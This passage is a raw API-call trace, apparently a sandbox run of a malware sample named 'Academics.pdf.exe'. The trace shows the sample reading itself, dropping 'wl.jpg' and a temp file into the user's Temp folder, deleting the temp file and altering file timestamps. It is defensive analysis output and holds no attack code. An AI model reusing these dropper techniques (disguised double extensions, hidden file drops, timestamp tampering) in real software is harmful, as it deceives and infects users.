dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.633] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0268.634] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.634] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0268.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8beb64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.636] GetFileType (hFile=0x2a0) returned 0x1 [0268.636] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.637] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.637] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.638] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.638] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.639] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.640] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.640] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.641] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.641] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.642] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0268.642] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8aeb4c, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8aeb4c*=0x1000, lpOverlapped=0x0) returned 1 [0268.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8beb7c | out: lpSystemTimeAsFileTime=0x8beb7c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.642] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8bebe8 | out: lpFindFileData=0x8bebe8*(dwFileAttributes=0xc0, ftCreationTime.dwLowDateTime=0x8bebf8, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x25c0abc, ftLastAccessTime.dwHighDateTime=0x8bec38, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0x6ad1c79f, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8adc5c | out: lpSystemTimeAsFileTime=0x8adc5c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.643] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.644] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.644] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.644] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.644] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0268.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x3f6390b0, dwHighDateTime=0x1d509d7)) [0268.645] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8ada70 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0268.645] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8ae130 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\aut55C0.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\aut55c0.tmp")) returned 0x55c0 [0268.647] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\aut55C0.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\aut55c0.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8adb44, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0268.647] GetFileType (hFile=0x2c8) returned 0x1 [0268.647] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aefc5, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8adb80, lpOverlapped=0x0 | out: lpBuffer=0x8aefc5*, lpNumberOfBytesRead=0x8adb80*=0xf000, lpOverlapped=0x0) returned 1 [0268.647] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb70, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8adb70*=0x1000, lpOverlapped=0x0) returned 1 [0268.654] ReadFile (in: hFile=0x2a0, lpBuffer=0x8aefc5, nNumberOfBytesToRead=0xa000, lpNumberOfBytesRead=0x8adb80, lpOverlapped=0x0 | out: lpBuffer=0x8aefc5*, lpNumberOfBytesRead=0x8adb80*=0xa000, lpOverlapped=0x0) returned 1 [0268.654] ReadFile (in: hFile=0x2a0, lpBuffer=0x24f7260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb70, lpOverlapped=0x0 | out: lpBuffer=0x24f7260*, lpNumberOfBytesRead=0x8adb70*=0x1000, lpOverlapped=0x0) returned 1 [0268.658] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\aut55C0.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\aut55c0.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8adb30, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0268.658] GetFileType (hFile=0x2c8) returned 0x1 [0268.658] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\wl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x8adb30, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0268.659] GetFileType (hFile=0x268) returned 0x1 [0268.660] ReadFile (in: hFile=0x2c8, lpBuffer=0x34a4048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb40, lpOverlapped=0x0 | out: lpBuffer=0x34a4048*, lpNumberOfBytesRead=0x8adb40*=0x1000, lpOverlapped=0x0) returned 1 [0268.661] ReadFile (in: hFile=0x2c8, lpBuffer=0x24b8a40, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8adb28, lpOverlapped=0x0 | out: lpBuffer=0x24b8a40*, lpNumberOfBytesRead=0x8adb28*=0xf000, lpOverlapped=0x0) returned 1 [0268.661] ReadFile (in: hFile=0x2c8, lpBuffer=0x34a4048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb18, lpOverlapped=0x0 | out: lpBuffer=0x34a4048*, lpNumberOfBytesRead=0x8adb18*=0x1000, lpOverlapped=0x0) returned 1 [0268.665] ReadFile (in: hFile=0x2c8, lpBuffer=0x24b8a40, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8adb28, lpOverlapped=0x0 | out: lpBuffer=0x24b8a40*, lpNumberOfBytesRead=0x8adb28*=0x9bca, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x2c8, lpBuffer=0x24c260a, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x8adb28, lpOverlapped=0x0 | out: lpBuffer=0x24c260a*, lpNumberOfBytesRead=0x8adb28*=0x0, lpOverlapped=0x0) returned 1 [0268.671] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\aut55C0.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\aut55c0.tmp")) returned 1 [0268.673] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\wl.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0268.673] SetFileTime (hFile=0x268, lpCreationTime=0x8adcb8, lpLastAccessTime=0x0, lpLastWriteTime=0x8adcc0) returned 1 [0268.673] CloseHandle (hObject=0x268) returned 1 [0268.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0268.677] CloseHandle (hObject=0x2a0) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0268.679] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0268.680] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.680] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0268.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.681] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: 